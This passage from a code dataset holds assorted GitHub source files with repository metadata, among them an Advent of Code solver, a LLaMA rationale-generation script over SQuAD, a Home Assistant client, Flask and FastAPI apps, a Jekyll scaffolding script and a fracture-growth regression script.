j)\n\n if proposed_destination:\n if proposed_destination in proposed_moves:\n proposed_moves[proposed_destination].append((i, j))\n else:\n proposed_moves[proposed_destination] = [(i, j)]\n\n for new_pos in proposed_moves:\n if (len(proposed_moves[new_pos])) == 1:\n xinit, yinit = proposed_moves[new_pos][0]\n xnew, ynew = new_pos\n grid[xinit] = grid[xinit][:yinit] + '.' + grid[xinit][yinit + 1:]\n grid[xnew] = grid[xnew][:ynew] + '#' + grid[xnew][ynew + 1:]\n index = next(i for i, pos in enumerate(elves) if pos[0] == xinit and pos[1] == yinit)\n elves[index] = (xnew, ynew)\n t=1\n \n if set(elves_check) == set(elves):\n print(f\"The first round where no elves moves is: {round + 1}\")\n flag = 1\n return grid, elves, flag\n\ndef count_empty_ground_tiles(grid):\n # Find the minimum and maximum row and column indices that contain an elf\n min_row, max_row = float('inf'), -float('inf')\n min_col, max_col = float('inf'), -float('inf')\n\n for i in range(len(grid)):\n for j in range(len(grid[i])):\n if grid[i][j] == ELF:\n min_row = min(min_row, i)\n max_row = max(max_row, i)\n min_col = min(min_col, j)\n max_col = max(max_col, j)\n \n # Count the number of empty ground tiles in the rectangle\n count = 0\n for i in range(min_row, max_row+1):\n for j in range(min_col, max_col+1):\n if grid[i][j] == GROUND:\n count += 1\n \n return count \n\n# __ __ _ ___ _ _ \n# | \\/ | /_\\ |_ _| \\| |\n# | |\\/| |/ _ \\ | || .` |\n# |_| |_/_/ \\_\\___|_|\\_|\n \nif __name__ == '__main__':\n\n filename = \"23.in\"\n with open(filename, 'r') as f:\n datas = f.read().strip().split(\"\\n\")\n\n width = len(datas[0])\n height = len(datas)\n elves = get_init_pos_elves(datas)\n nb_round = 1000\n\n for round in range(nb_round):\n datas, elves, flag = one_round_move_elves(datas, elves, round)\n valid_directions.rotate(-1)\n if flag == 1:\n break\n count_nb_tiles = count_empty_ground_tiles(datas)\n print(f\"First part: There is {count_nb_tiles} empty ground tiles for {round + 1} rounds\")\n print(f\"Second part: The first round where elves stop moving is {round + 
1}\")\n\n\n","repo_name":"RomB29/Advent_of_code","sub_path":"2022/23/23.py","file_name":"23.py","file_ext":"py","file_size_in_byte":4842,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"6148033054","text":"class Cooperator:\r\n def __init__(self, name, age, salary):\r\n self.name = name\r\n self.age = age\r\n self.salary = salary\r\n\r\n def information(self):\r\n print(\"Имя:\", self.name)\r\n print(\"Возраст:\", self.age)\r\n print(\"Зарплата:\", self.salary)\r\n\r\ncooperator1 = Cooperator(\"Никита\", 20, 100000)\r\ncooperator2 = Cooperator(\"Андрей\", 33, 15000)\r\ncooperator3 = Cooperator(\"Анна\", 40, 330000)\r\n\r\ncooperators = [cooperator1, cooperator2, cooperator3]\r\n\r\nfor cooperator in cooperators:\r\n cooperator.information()\r\nprint()","repo_name":"annashteynert/Shteynert-AD-2","sub_path":"task24.py","file_name":"task24.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2105447340","text":"import os\nimport jsonlines\nfrom tqdm import tqdm\nimport torch\nfrom peft import PeftModel\n\nfrom typing import Optional\n\nfrom datasets import load_dataset\nfrom langchain import PromptTemplate, FewShotPromptTemplate\nfrom transformers import AutoModelForCausalLM, T5Tokenizer, AutoTokenizer, AutoConfig\nfrom transformers import GenerationConfig, LlamaForCausalLM, LlamaTokenizer\n\n# from src.few_shot.utils import save_to_disk\n# from src.few_shot.together import infer\n\n\nBASE_PATH = \"/storage/ukp/work/sachdeva/research_projects/exp_calibration/\"\n\n\ndef save_to_disk(data, file_name):\n with jsonlines.open(file_name, \"a\") as writer:\n for example in tqdm(data, total=len(data), desc=\"Saving samples ... 
\"):\n writer.write(example)\n\n\nclass LLMClient:\n def __init__(\n self,\n template,\n model_name_or_path: str = None,\n tokenizer_name_or_path: Optional[str] = None,\n data_path: str = None,\n threshold: float = 0.5,\n task: str = \"qg\",\n max_new_tokens: int = 50,\n temperature: float = 0.01,\n top_p: float = 1,\n top_k: int = 40,\n repetition_penalty: float = 1.0,\n save_results: bool = True,\n max_samples: int = None,\n stop: str = \"\\n\",\n ):\n self.base_model = model_name_or_path\n self.tokenizer = tokenizer_name_or_path\n self.max_new_tokens = max_new_tokens\n self.temperature = temperature\n self.top_p = top_p\n self.top_k = top_k\n self.repetition_penalty = repetition_penalty\n self.data_path = data_path\n self.task = task\n self.threshold = threshold\n self.save_results = save_results\n self.max_samples = max_samples\n self.stop = stop.split(\";\")\n self.device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n self.lora_weights = f\"{BASE_PATH}alpaca-cot-13b\"\n\n def _load_model(self):\n tokenizer = LlamaTokenizer.from_pretrained(self.base_model)\n model = LlamaForCausalLM.from_pretrained(\n self.base_model,\n load_in_8bit=True,\n torch_dtype=torch.float16,\n device_map=\"auto\",\n )\n model = PeftModel.from_pretrained(\n model, self.lora_weights, torch_dtype=torch.float16,\n )\n model.to(self.device)\n # unwind broken decapoda-research config\n model.config.pad_token_id = tokenizer.pad_token_id = 0 # unk\n model.config.bos_token_id = 1\n model.config.eos_token_id = 2\n return model, tokenizer\n\n def _create_zero_shot_prompt(self, context, question, answer):\n prompt = qg_template.format(context=context, question=question, answer=answer)\n return prompt\n\n def generate(self):\n c = 0\n skipped_instances = 0\n examples = []\n model, tokenizer = self._load_model()\n\n model_identifier = self.base_model.split(\"/\")[-1]\n save_path = (\n BASE_PATH\n + f\"src/data/squad/{model_identifier}_{self.task}_pipeline_temp_0.7\"\n )\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n\n # load squad data\n dataset = load_dataset(\"squad\", \"plain_text\")\n train_data = dataset[\"train\"]\n squad_data = [\n sample\n for sample in tqdm(\n train_data, total=len(train_data), desc=\"Loading SQuAD data ... 
\"\n )\n ]\n\n current_files = []\n file_names = []\n file_path = BASE_PATH + f\"src/data/squad/{self.data_path}\"\n file_names = [file_path]\n\n model.eval()\n for file_name in file_names:\n with jsonlines.open(file_name) as reader:\n for example in tqdm(reader):\n try:\n id = example[\"id\"].split(\"_\")[0]\n context = example[\"context\"]\n orig_example = [\n sample for sample in squad_data if sample[\"id\"] == id\n ][0]\n # print(orig_example)\n orig_context = orig_example[\"context\"]\n orig_question = orig_example[\"question\"]\n orig_answer = orig_example[\"answers\"]\n c += 1\n\n if self.max_samples:\n if c == self.max_samples:\n break\n\n prompt = self._create_zero_shot_prompt(\n context=orig_context,\n question=orig_question,\n answer=orig_answer[\"text\"][0],\n )\n # print(prompt)\n\n inputs = tokenizer(prompt, return_tensors=\"pt\").to(self.device)\n\n outputs = model.generate(\n **inputs,\n max_new_tokens=self.max_new_tokens,\n temperature=self.temperature,\n top_p=self.top_p,\n top_k=self.top_k,\n repetition_penalty=self.repetition_penalty,\n do_sample=True,\n # num_return_sequences=1,\n early_stopping=True,\n pad_token_id=tokenizer.eos_token_id,\n )\n output = tokenizer.decode(outputs[0], skip_special_tokens=True)\n # remove the context from the output\n output = output[len(prompt) :]\n\n result = {\"id\": example[\"id\"], \"context\": context}\n\n print(\"Context:\", orig_context)\n print(\"Question:\", orig_question)\n print(\"Answer:\", orig_answer[\"text\"][0])\n print(\"Explanation:\", output)\n print(\"-\" * 100)\n #\n # examples.append(result)\n # if self.save_results:\n # if c % self.threshold == 0:\n # save_to_disk(\n # examples,\n # f\"{save_path}/counterfactual_samples_{model_identifier}_{c}.jsonl\"\n # )\n # examples = []\n except Exception as e:\n # print(outputs)\n skipped_instances += 1\n print(f\"Skipped instance {c} due to error: {e}.\")\n continue\n\n if c == 5:\n break\n\n # save the remaining examples\n # if self.save_results:\n # if examples:\n # save_to_disk(\n # examples,\n # f\"{save_path}/counterfactual_samples_{model_identifier}_{c}.jsonl\"\n # )\n break\n\n\nif __name__ == \"__main__\":\n\n qg_template = \"\"\"\nAs an answer explainer, your job is to give a rationale for the answer to the following question given the context it is derived from. 
\nThe rationale should express a clear line of reasoning that led to the answer.\n\nContext: {context}\n\nQuestion: {question}\n\nAnswer: {answer}\n\nRationale: Let's think step by step,\n\n\"\"\".strip()\n\n    model = \"decapoda-research/llama-13b-hf\"\n    client = LLMClient(\n        template=qg_template,\n        model_name_or_path=model,\n        tokenizer_name_or_path=model,\n        task=\"zero-shot-cot\",\n        data_path=\"squad_counterfactuals_28_03.jsonl\",\n        threshold=1000,\n        max_new_tokens=128,\n        temperature=0.7,\n        top_p=1,\n        top_k=40,\n        repetition_penalty=1.0,\n        save_results=True,\n        max_samples=None,\n    )\n\n    client.generate()\n","repo_name":"UKPLab/CATfOOD","sub_path":"src/cf_generation/llm_generation/alpaca_cot.py","file_name":"alpaca_cot.py","file_ext":"py","file_size_in_byte":7923,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"23304261257","text":"import asyncio\nimport logging\nfrom functools import partial\nimport requests\n\nlogger = logging.getLogger(__name__)\n\n\nasync def async_request(method, *args, **kwargs):\n    loop = asyncio.get_running_loop()\n    func = partial(\n        getattr(requests, method),\n        *args,\n        **kwargs,\n    )\n    result = await loop.run_in_executor(None, func)\n    return result\n\n\nclass HomeAssistantLight:\n    def __init__(self, ha_host, ha_token, ha_entity, on_update) -> None:\n        self.on_update = on_update\n        self.connected = False\n        self.current_state = None\n\n        self.ha_host = ha_host\n        self.ha_token = ha_token\n        self.ha_entity = ha_entity\n        self.ha_domain = \"switch\"\n\n    async def set_state(self, state):\n        service = \"turn_on\" if state else \"turn_off\"\n        data = {\n            \"entity_id\": self.ha_entity,\n        }\n        endpoint = f\"/api/services/{self.ha_domain}/{service}\"\n        resp = await self._http_post(endpoint, data)\n        updated_state = self._state_after_service(resp)\n        if updated_state is not None:\n            self.current_state = updated_state\n            self.on_update()\n\n    async def get_state(self):\n        endpoint = f\"/api/states/{self.ha_entity}\"\n        resp = await self._http_get(endpoint)\n        return resp[\"state\"]\n\n    def disconnect(self):\n        self.connected = False\n\n    def connect(self):\n        self.connected = True\n        asyncio.get_running_loop().create_task(self.state_polling())\n\n    async def state_polling(self):\n        while self.connected:\n            try:\n                state = await self.get_state()\n            except Exception:\n                # keep polling even when a request fails; surface the failure as an error state\n                state = \"error\"\n\n            self.current_state = state\n            self.on_update()\n\n            await asyncio.sleep(60)\n\n    def _state_after_service(self, resp):\n        for change in resp:\n            if change[\"entity_id\"] == self.ha_entity:\n                return change[\"state\"]\n        return None\n\n    def _http_headers(self):\n        return {\n            \"Authorization\": f\"Bearer {self.ha_token}\",\n            \"content-type\": \"application/json\",\n        }\n\n    async def _http_get(self, endpoint):\n        resp = await async_request(\n            \"get\",\n            f\"{self.ha_host}{endpoint}\",\n            headers=self._http_headers(),\n            timeout=2,\n        )\n        resp.raise_for_status()\n        return resp.json()\n\n    async def _http_post(self, endpoint, data):\n        resp = await async_request(\n            \"post\",\n            f\"{self.ha_host}{endpoint}\",\n            json=data,\n            headers=self._http_headers(),\n            timeout=2,\n        )\n        resp.raise_for_status()\n        return resp.json()\n","repo_name":"wlatanowicz/kalwy-ao","sub_path":"devices/hardware/HomeAssistantLight.py","file_name":"HomeAssistantLight.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11695166025","text":"from flask import Blueprint\nfrom .resources import *\nfrom app.ext import 
api\n\n\napi_v1 = Blueprint(\"api_v1\",__name__)\n\n\n# user\napi.route(UserDetail,\"user_detail\",\"/user/<int:id>\",\"/order/<int:id>/user\")#GET PATCH DELETE; POST user still pending, move it to the list resource \napi.route(UserList,\"user_list\",\"/user\", \"/role/<int:id>/user\")#GET users, POST User.\napi.route(UserRelationship,\"user_roles\",\"/user/<int:id>/relationship/role\")#GET POST PATCH DELETE relationship\napi.route(UserOrderRelationship,\"user_order\",\"/user/<int:id>/relationship/order\")#GET POST PATCH DELETE relationship \n# role\napi.route(RoleDetail,\"role_detail\", \"/role/<int:id>\") #GET PATCH DELETE role\napi.route(RoleList,\"role_list\", \"/role\" ,\"/user/<int:id>/role\") #GET POST role, POST role=>user\napi.route(RoleRelationship,\"role_users\",\"/role/<int:id>/relationship/user\") #GET POST PATCH DELETE relationship \n# category\napi.route(CategoryDetail,\"category_detail\",\"/category/<int:id>\", \"/article/<int:id>/category\") #GET PATCH DELETE category \napi.route(CategoryList, \"category_list\", \"/category\") #GET POST CATEGORY\napi.route(CategoryRelationship, \"category_articles\", \"/category/<int:id>/relationship/article\") #GET POST PATCH DELETE relationship; DELETE does not work, fix the 204 response\n\n# articles\napi.route(ArticleDetail,\"article_detail\",\"/article/<int:id>\",\"/orderarticle/<int:id>/article\")##GET PATCH DELETE, and PATCH by ARTICLE_ID\napi.route(ArticleList, \"article_list\", \"/article\", \"/category/<int:id>/article\")#GET POST ARTICLE, POST ARTICLE => CATEGORY\napi.route(ArticleRelationship, \"article_category\", \"/article/<int:id>/relationship/category\")#GET POST PATCH DELETE relationship\napi.route(ArticleAsscOrderRelationship, \"article_assc\", \"/article/<int:id>/relationship/orderarticle\")#GET POST PATCH DELETE relationship\n\n# Order(1)\napi.route(OrderDetail,\"order_detail\",\"/order/<int:id>\", \"/orderarticle/<int:id>/order\")# GET PATCH DELETE ORDER\napi.route(OrderList, \"order_list\",\"/order\",\"/user/<int:id>/order\",\"/articleorder/<int:id>/order\")## GET POST ORDER, POST ORDER =>USER\napi.route(OrderAsscArticleRelationship, \"order_assc\",\"/order/<int:id>/relationship/orderarticle\")#GET POST PATCH DELETE relationship\napi.route(OrderUserRelationship, \"order_user\",\"/order/<int:id>/relationship/user\")##GET POST PATCH DELETE relationship\n \n# Order_Article:\napi.route(OrderArticleDetail,\"orderarticle_detail\",\"/orderarticle/<int:id>\")# GET PATCH DELETE ORDER_ARTICLE ASSOCIATION\n\napi.route(OrderArticleList, \"orderarticle_list\", \n    \"/orderarticle\", \n    \"/order/<int:id>/orderarticle\", \n    \"/article/<int:id>/orderarticle\")##GET POST ARTICLE_ASSOCIATION, POST ORDER_ARTICLE => ORDER, POST ORDER_ARTICLE => ARTICLE\n\napi.route(OrderArticleArticleRelationship, \"orderarticle_article\", \"/orderarticle/<int:id>/relationship/article\")#GET POST PATCH DELETE relationship\n\napi.route(OrderArticleOrderRelatioship, \"orderarticle_order\", \"/orderarticle/<int:id>/relationship/order\")#GET POST PATCH DELETE relationship\n","repo_name":"ManuelSBZ/Api_Ecommerce","sub_path":"app/api_data_layer/api_v1/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25653575939","text":"from flask import Flask, request\nfrom caesar import rotate_character, alphabet_position\napp = Flask(__name__)\napp.config['DEBUG'] = True\nheader=\"\"\"\n<!DOCTYPE html>\n<html>\n<head>\n</head>\n<body>\n\"\"\"\nbody=\"\"\"\n
<form method=\"POST\">\n<textarea name=\"text\" rows=\"10\" cols=\"40\">{0}</textarea>\n<br>\nRotate by:\n<input type=\"text\" name=\"rot\" value=\"0\"/>\n<br>\n<input type=\"submit\"/>\n</form>\n
\"\"\" \nfooter=\"\"\"\n\"\"\"\n\n@app.route(\"/\")\ndef index():\n new_str = \"\"\n return header + body.format(new_str) + footer\n \n@app.route(\"/\", methods=['POST'])\ndef encrypt():\n text = request.form['text']\n rot = int(request.form['rot'])\n new_str = \"\"\n for i in range(len(text)):\n if text[i].isalpha():\n new_str = new_str + rotate_character(text[i], rot)\n else:\n new_str = new_str + text[i]\n return header + body.format(new_str) + footer\n\napp.run()","repo_name":"Hugo-J-Hoffman/web-caesar_1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"731051428","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\nimport time, datetime\nimport re\nimport sys\n\nimport shutil\nimport glob\nfrom pathlib import Path\nimport json\n\n\n# # Function\n\n# In[2]:\n\n\ndef createSidebar(projectName):\n newProject = projectName\n \n cwd = os.getcwd()\n templateSidebar = cwd + '\\\\_template\\\\template_sidebar.yml'\n dstFile = templateSidebar.replace('\\\\_template\\\\','\\\\_data\\\\sidebars\\\\').replace('template',newProject)\n \n srcFile = templateSidebar\n dstFile = templateSidebar.replace('\\\\_template\\\\','\\\\_data\\\\sidebars\\\\').replace('template',newProject)\n shutil.copy(srcFile, dstFile)\n \n with open(srcFile,'r', encoding=\"utf8\") as src:\n with open(dstFile,'w', encoding=\"utf8\") as dst:\n\n line = src.readline()\n\n while line:\n if 'template' in line:\n line = line.replace('template',newProject)\n\n dst.write(line) \n line = src.readline()\n \n print('Finished creating sidebar')\n\n\n# In[3]:\n\n\ndef createPosts(projectName):\n newProject = projectName\n \n cwd = os.getcwd()\n \n src = cwd + '\\\\_template\\\\templatePost\\\\'\n dst = cwd + '\\\\_posts\\\\'+newProject\n \n shutil.copytree(src, dst) \n \n print('Finished creating posts')\n\n\n# In[4]:\n\n\ndef createPages(projectName):\n newProject = projectName\n \n cwd = os.getcwd()\n \n srcFolder = cwd + '\\\\_template\\\\templatePages\\\\'\n dstFolder = cwd + '\\\\pages\\\\'+newProject + '\\\\'\n os.mkdir(dstFolder)\n \n onlyfiles = [f for f in listdir(srcFolder) if isfile(join(srcFolder, f))]\n \n for fileName in onlyfiles:\n with open(srcFolder+fileName,'r', encoding=\"utf8\") as src:\n with open(dstFolder+fileName.replace('template',newProject),'w', encoding=\"utf8\") as dst:\n line = src.readline()\n\n while line:\n if 'template' in line:\n line = line.replace('template',newProject)\n\n dst.write(line) \n line = src.readline() \n \n print('Finished creating pages')\n\n\n# In[5]:\n\n\ndef addToNav(projectName):\n newProject = projectName\n \n cwd = os.getcwd()\n \n navFile = cwd + '\\\\_data\\\\topnav.yml'\n\n with open(navFile,'a', encoding=\"utf8\") as nav:\n nav.write('\\n')\n nav.write(f\" - title: {newProject}\\n\")\n nav.write(f\" url: /{newProject}_intro.html\")\n \n print('Finished adding to topnav.html')\n\n\n# In[6]:\n\n\ndef main(projectName):\n createSidebar(projectName)\n createPosts(projectName)\n createPages(projectName)\n addToNav(projectName) \n\n\n# # Main\n\n# In[7]:\n\n\n#newProject = 'newProject'\n\n\n# In[8]:\n\n\n#main(newProject)\n\n\n# In[ ]:\n\n\nif __name__ == '__main__':\n argList = list(sys.argv)\n 
main(argList[1])\n\n","repo_name":"mgaringoDev/FaceChangeOnWord","sub_path":"docs/makeNewProject.py","file_name":"makeNewProject.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72080289707","text":"from random import randint\n\n\ndef menuNovaInscricao():  # define the functions used by the main menu\n    nome = input(\"Digite seu nome: \")\n    email = input(\"Digite email: \")\n    telefone = input(\"Digite telefone: \")\n    curso = input(\"Digite curso: \")\n    # do not reseed the generator here: seeding with a constant before every\n    # draw would give every registration exactly the same voucher number\n    voucher = randint(100, 400)\n    dicionario = {\n        \"Voucher\": voucher,\n        \"Nome\": nome,\n        \"Email\": email,\n        \"Telefone\": telefone,\n        \"Curso\": curso\n    }\n    listaalunos.append(dicionario)\n\n\n\ndef menuVisualizaInscricao(lista):\n    print(lista)\n\n\ndef menuPrincipal():\n    op = True\n    while op:\n        print(\"*********Menu*********\")\n        menuop = int(input(\"1- Nova inscrição \\n2- Visualizar inscrição \\n0- Encerrar \\nOpção escolhida: \"))\n        if menuop == 1:\n            menuNovaInscricao()\n        elif menuop == 2:\n            if len(listaalunos) != 0:\n                print(\"---------------Lista inscritos---------------\")\n                menuVisualizaInscricao(listaalunos)\n                print(\"---------------\")\n            else:\n                print(\"Nenhuma inscrição cadastrada\")\n        elif menuop == 0:\n            op = False\n        else:\n            print(\"Erro: digite uma opção válida!\")\n\n\nlistaalunos = []  # global variable in the main program\nmenuPrincipal()\n","repo_name":"deborahregina/trabalhofinalprogramacao1","sub_path":"questao4.py","file_name":"questao4.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41844513775","text":"# -*- coding: utf-8 -*-\nimport pandas as pd\nimport numpy as np\nimport random\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import metrics\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.preprocessing import RobustScaler\nfrom sklearn.feature_selection import RFE\nfrom sklearn.feature_selection import RFECV\n\n#filen = 'txts/M8_2_track_params_cont.txt' \n#filen = 'txts/M8_track_params_cont.txt' \n#filen = 'txts/MONZ5_track_params_cont.txt' \nfilen = 'txts/WG04_track_params_cont.txt' \n\nitr = 5000 # number of iterations in solver\ntsi = 0.20 # test size\n\nscale = 1 # scale features\ncol_scale = ['min-dist', 'mean-dist',\n       'median-dist', 'mean-10_dist', 'median-10_dist', 'theta1', 'theta2',\n       'theta3', 'd1', 'd2', 'd3', 'aniso', 'elong', 'volume']\n\n# percentile of volume range\n# only from 10-100th percentile\nq=10\nq_next = 100\n \n# change in volume percentage\n#perc = 0.70;\nis_equal=1; # do or do not down sample to make equal categories\n#percs = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7]\npercs = [0.5]\nfor perc in percs:\n    print(perc)\n    txt_name = 'txts/score_EXP_p'+str(round(perc*100))+'_p'+str(q)+'_wEX_accur.txt'\n    exp_str = filen.split('_')\n    exp_str = exp_str[0]\n    exp_s = exp_str[5:]\n    if 'M8_2' in filen:\n        exp_s = exp_s+'_2'\n    \n    txt_name = txt_name.replace('EXP', exp_s)\n    \n    # run model multiple times for different fracture populations\n    \n    recalls = []\n    accurs = []\n    precis = []\n    rocs = []\n    num_g1 = []\n    num_g0 = []\n    \n    ranks = []\n    rankscv = []\n    qfeats = []\n    witers = []\n    featns = []\n    coef_tot = []\n    sig_tot = []\n    scorcv = []\n    selcv = []\n    coeffs = []\n    #statf = 'p tp tn fp fn TPR FPR \\n'\n    \n    it=0;\n    maxi = 50;\n    while itthr_high\n        \n        #ind_rem = 
list(compress(list_a, not(fil)))\n i=0 \n for bol1 in bool_1:\n bol2 = bool_2[i]\n if bol1 or bol2:\n remn= remn+1\n inds.append(i+i_c)\n \n i=i+1\n \n i_c=i_c+i\n \n df_thresh = df_thresh.drop(df_thresh.index[inds])\n df = df_thresh\n \n #q_prev = q\n # only consider fractures growing by X% of their volume\n # within certain %s\n df = df[abs(df[\"delvol\"])> perc*df[\"volume\"]]\n \n # count the number of true and faulse\n grow_bin = df[\"is_grow\"].values\n num_1 = len(grow_bin[grow_bin==1])\n num_0 = len(grow_bin[grow_bin==0])\n \n # randomly select subsets of growing fractures so ratio of num_0 and num_1= 1\n # find the index of values to drop, \n if is_equal and num_0 int:\n counter, set_counter = use_state(0)\n set_counter(counter + 1)\n return counter\n\n\nclass Bar:\n def __init__(self):\n self.counter = 0\n\n def python_state(self) -> int:\n self.counter += 1\n return self.counter\n\n\ndef test_local_state() -> None:\n python_state = Timer(Bar().python_state).repeat(repeat=100000, number=1)\n hooks_state = Timer(Foo().local_state).repeat(repeat=100000, number=1)\n python_state_median = median(python_state)\n hooks_state_median = median(hooks_state)\n\n overhead = hooks_state_median / python_state_median\n\n allowed_overhead: int = 30\n\n if overhead > allowed_overhead:\n with Profile() as profile:\n timeit(Foo().local_state, number=100000)\n (Stats(profile).strip_dirs().sort_stats(SortKey.TIME).print_stats())\n assert overhead < allowed_overhead, \"Performance is not good enough\"\n","repo_name":"amitassaraf/python-hooks","sub_path":"tests/test_hooks/test_performance.py","file_name":"test_performance.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"37"} +{"seq_id":"74464015786","text":"import json\n\nclass Config:\n def __init__(self):\n self.preview = True\n # self.enableSettings = False\n self.captureWindowName = \"ウィンドウ プロジェクタ\"\n self.showGrid = False\n self.showStencil = False\n self.xCoord = 0\n self.yCoord = 0\n self.width = 512\n self.height = 448\n self.enableSettingsExpert = False\n self.captureFPS = 60\n self.sendFPS = 5\n self.windowHandle = 0\n self.blackThreshold = 25\n self.inGameThreshold = 30000\n self.address = \"localhost:5041\"\n self.playerName = \"\"\n self.accessKey = \"\"\n\n def load(self):\n try:\n with open(\"config.json\", mode=\"r\") as f:\n hash = json.loads(f.read())\n def isValid(key, typ):\n return key in hash and type(hash[key]) == typ\n if isValid(\"preview\", bool): self.preview = hash[\"preview\"]\n # if isValid(\"enableSettings\", bool): self.enableSettings = hash[\"enableSettings\"]\n if isValid(\"captureWindowName\", str): self.captureWindowName = hash[\"captureWindowName\"]\n if isValid(\"showGrid\", bool): self.showGrid = hash[\"showGrid\"]\n if isValid(\"showStencil\", bool): self.showStencil = hash[\"showStencil\"]\n if isValid(\"xCoord\", int): self.xCoord = hash[\"xCoord\"]\n if isValid(\"yCoord\", int): self.yCoord = hash[\"yCoord\"]\n if isValid(\"width\", int): self.width = hash[\"width\"]\n if isValid(\"height\", int): self.height = hash[\"height\"]\n if isValid(\"enableSettingsExpert\", bool): self.enableSettingsExpert = hash[\"enableSettingsExpert\"]\n if isValid(\"captureFPS\", int): self.captureFPS = hash[\"captureFPS\"]\n if isValid(\"sendFPS\", int): self.sendFPS = hash[\"sendFPS\"]\n if isValid(\"windowHandle\", int): self.windowHandle = hash[\"windowHandle\"]\n if isValid(\"blackThreshold\", int): self.blackThreshold = 
hash[\"blackThreshold\"]\n if isValid(\"inGameThreshold\", int): self.inGameThreshold = hash[\"inGameThreshold\"]\n if isValid(\"address\", str): self.address = hash[\"address\"]\n if isValid(\"playerName\", str): self.playerName = hash[\"playerName\"]\n if isValid(\"accessKey\", str): self.accessKey = hash[\"accessKey\"]\n except:\n pass\n\n def save(self):\n try:\n with open(\"config.json\", mode=\"w\") as f:\n f.write(json.dumps({\n \"preview\": self.preview,\n # \"enableSettings\": self.enableSettings,\n \"captureWindowName\": self.captureWindowName,\n \"showGrid\": self.showGrid,\n \"showStencil\": self.showStencil,\n \"xCoord\": self.xCoord,\n \"yCoord\": self.yCoord,\n \"width\": self.width,\n \"height\": self.height,\n \"enableSettingsExpert\": self.enableSettingsExpert,\n \"captureFPS\": self.captureFPS,\n \"sendFPS\": self.sendFPS,\n \"windowHandle\": self.windowHandle,\n \"blackThreshold\": self.blackThreshold,\n \"inGameThreshold\": self.inGameThreshold,\n \"address\": self.address,\n \"playerName\": self.playerName,\n \"accessKey\": self.accessKey\n }))\n except:\n pass","repo_name":"NESTetrisJP/NESTrisOCR-CJL","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3061,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"43514901557","text":"from Tkinter import *\nimport tkFont\nimport webbrowser\nfrom flashcardstudy import help\n\ndef open_website(evt):\n webbrowser.open(r\"https://github.com/comatory/flashCardStudy\")\n\ndef open_twitter(evt):\n webbrowser.open(r\"https://twitter.com/ondrejsynacek\")\n\n\ndef about_window():\n about = Toplevel()\n data = help.author_data()\n\n about_frame = Frame(about)\n about_frame.grid(row=0, column=0, padx=20, pady=10)\n\n appname_label = Label(about_frame, text='flashCardStudy ' + 'v' + data['version'], font='-weight bold')\n appname_label.grid(row=0, column=0)\n\n authorname_label = Label(about_frame, text='programming: ' + data['devname'])\n authorname_label.grid(row=1, column=0)\n\n twitter_link_label = Label(about_frame, text=data['twitter'], font='-underline True')\n twitter_link_label.grid(row=2, column=0)\n twitter_link_label.bind('', open_twitter)\n\n website_link_label = Label(about_frame, text=data['web'], font='-underline True')\n website_link_label.grid(row=3, column=0)\n website_link_label.bind('', open_website)\n\n spacer = Label(about_frame)\n spacer.grid(row=4, column=0)\n\n thanks_label = Label(about_frame, text='Thanks to:')\n thanks_label.grid(row=5, column=0)\n\n thankers_label = Label(about_frame, text = data['thanks'])\n thankers_label.grid(row=6, column=0)\n\n close_button = Button(about_frame, text='Close', command=about.destroy)\n close_button.grid(row=7, column=0)\n \n \n","repo_name":"eltolis/flashCardStudy","sub_path":"gui/about.py","file_name":"about.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3094197685","text":"from fastapi import FastAPI\r\n\r\nfrom src.api import collect_movies\r\nfrom src.containers import Container\r\n\r\n\r\ndef create_app():\r\n container = Container()\r\n container.wire(packages=[collect_movies])\r\n\r\n fastapi_app = FastAPI()\r\n fastapi_app.container = container\r\n fastapi_app.include_router(collect_movies.router, prefix=\"/api/v1\")\r\n return fastapi_app\r\n\r\n\r\napp = 
create_app()\r\n","repo_name":"chedv/content-aggregator","sub_path":"src/api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73341578027","text":"from telegram import Update\nfrom telegram.ext import ContextTypes\n\nclass Filter:\n callback_query_pattern = None\n \"\"\"For making patterns more consistent\"\"\"\n\n def __init__(self, update: Update, context: ContextTypes.DEFAULT_TYPE, id: str, **kwargs) -> None:\n self.id = id\n self.text = kwargs.get('override_text', None) or self._get_filter(update, context)\n self.active = True\n self.subscribers = [update.effective_user.id]\n self.chat_id = update.effective_chat.id\n\n def _get_filter(self, update: Update, context: ContextTypes.DEFAULT_TYPE):\n try:\n filter_text = ' '.join(context.args)\n except (IndexError):\n update.effective_chat.send_message(\n \"You need to specify the type of message you want to message\")\n raise 